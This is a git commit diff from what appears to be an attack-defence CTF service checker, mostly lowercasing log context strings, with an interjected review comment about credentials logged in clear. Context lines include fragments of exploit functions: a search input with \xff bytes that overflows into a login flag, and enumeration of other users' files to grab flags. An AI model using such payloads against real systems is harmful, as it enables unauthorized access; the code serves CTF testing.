| author | Louis Burda <quent.burda@gmail.com> | 2021-07-06 17:43:38 +0200 |
|---|---|---|
| committer | Louis Burda <quent.burda@gmail.com> | 2021-07-06 17:43:38 +0200 |
| commit | af37f8075b0c1225f5e49339565bb6738c4d1f20 (patch) | |
| tree | 98a8075dda62b919881275ad2880328b54d245d9 /checker/src/checker.py | |
| parent | 166b238ace53d6ba5ccdc4a160778379a10b9967 (diff) | |
bump enochecker3 and fix context messages in read calls
Diffstat (limited to 'checker/src/checker.py')
| -rw-r--r-- | checker/src/checker.py | 32 |
1 files changed, 14 insertions, 18 deletions
diff --git a/checker/src/checker.py b/checker/src/checker.py index 846d858..6a05448 100644 --- a/checker/src/checker.py +++ b/checker/src/checker.py @@ -383,7 +383,7 @@ async def do_auth( await session.drain() # Check for errors - resp = await session.readline(ctx="Reading auth response (1)") + resp = await session.readline(ctx="reading auth response (1)") if b"ERR:" in resp: if check: session.logger.critical(f"Failed to login with {authstr!r}:\n{resp!r}") @@ -391,7 +391,7 @@ async def do_auth( return None # Also check success message - resp += await session.readuntil(prompt, ctx="Reading auth response (2)") + resp += await session.readuntil(prompt, ctx="reading auth response (2)") if b"Success!" not in resp: session.logger.critical(f"Login with pass {authstr!r} failed") raise MumbleException("Authentication not working properly") @@ -430,13 +430,13 @@ async def do_upload( # Check for errors # TODO improve by reading responses separately - resp = await session.readline(ctx="Reading upload response (1)") - resp += await session.readline(ctx="Reading upload response (2)") + resp = await session.readline(ctx="reading upload response (1)") + resp += await session.readline(ctx="reading upload response (2)") if b"ERR:" in resp: if check: session.logger.critical(f"Failed to upload model {modelname!r}:\n{resp!r}") raise MumbleException("File upload not working properly") - await session.readuntil(prompt, ctx="Waiting for prompt") + await session.readuntil(prompt, ctx="waiting for prompt") return None # Parse ID @@ -450,7 +450,7 @@ async def do_upload( ) raise MumbleException("File upload not working properly") - await session.readuntil(prompt, ctx="Waiting for prompt") + await session.readuntil(prompt, ctx="waiting for prompt") return modelid 
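Review bot: Both failure paths of do_auth write the credential into the log in clear: `Failed to login with {authstr!r}` in the @@ -383 hunk and `Login with pass {authstr!r} failed` in the @@ -391 hunk. If authstr is the secret guarding a stored flag, which the hunks suggest but do not show, anyone who can read checker logs can reuse it while that flag is valid. Logging a short digest keeps failures traceable without exposing the value, e.g. `session.logger.critical(f"Login failed (auth sha256 prefix {hashlib.sha256(authstr).hexdigest()[:8]})")`; this assumes authstr is bytes and that hashlib is imported, neither of which is visible here. The `{resp!r}` formatting is worth keeping, since repr escapes control characters in service output before they reach the log.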
@@ -489,13 +489,13 @@ async def do_search( # read until end of info box fileinfo = line + await session.readuntil( - b"================== \n", ctx="Reading stl info" + b"================== \n", ctx="reading stl info" ) stlfile = b"" if download: # Parse file contents - await session.readuntil(b"Here you go.. (", ctx="Reading stl size (1)") - resp = await session.readuntil(b"B)\n", ctx="Reading stl size (2)") + await session.readuntil(b"Here you go.. (", ctx="reading stl size (1)") + resp = await session.readuntil(b"B)\n", ctx="reading stl size (2)") resp = resp[:-3] size = parse_int(resp) if size is None: @@ -504,7 +504,7 @@ async def do_search( ) session.logger.debug(f"Download size: {size}") - stlfile = await session.read(size, ctx="Reading stl contents") + stlfile = await session.read(size, ctx="reading stl contents") await session.readuntil(prompt) return fileinfo, stlfile @@ -1019,18 +1019,15 @@ async def exploit_prefix_truncation(di: DependencyInjector) -> bytes: raise MumbleException("Failed to list files through search") # Use it to enumerate other files and grab contents - session.logger.debug( - "Targets:\n" + "\n".join([" - " + l.decode("latin1") for l in filelist]) - ) flag = None for i, fhash in enumerate(filelist): session.logger.debug(f"Retrieving file {fhash} at index {i}") session.write(f"{i}\nn\n".encode()) await session.drain() filelist_resp = await session.readuntil( - b"==================", ctx="Getting file info (1)" + b"==================", ctx="getting file info (1)" ) - filelist_resp += await session.readuntil(b"? ", ctx="Getting file info (2)") + filelist_resp += await session.readuntil(b"? ", ctx="getting file info (2)") if flag := searcher.search_flag(filelist_resp.decode("latin1")): break 
@@ -1053,10 +1050,10 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None: session = await di.get(Session) session.write(b"search \xff\xff\xff\xff\xff0000000000000000\n") await session.drain() - await session.readuntil(prompt, ctx="Getting user hashes via search") + await session.readuntil(prompt, ctx="getting user hashes via search") session.write(b"auth\n") await session.drain() - resp = await session.readuntil(prompt, ctx="Checking auth success") + resp = await session.readuntil(prompt, ctx="checking auth success") if b"Already logged in!" not in resp: raise MumbleException("Exploit did not set 'loggedin' variable via overflow") @@ -1064,7 +1061,6 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None: resp = await do_list(session, check=False) if not resp: raise MumbleException("") - session.logger.debug("list response: " + str(resp)) users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l] await session.exit() |
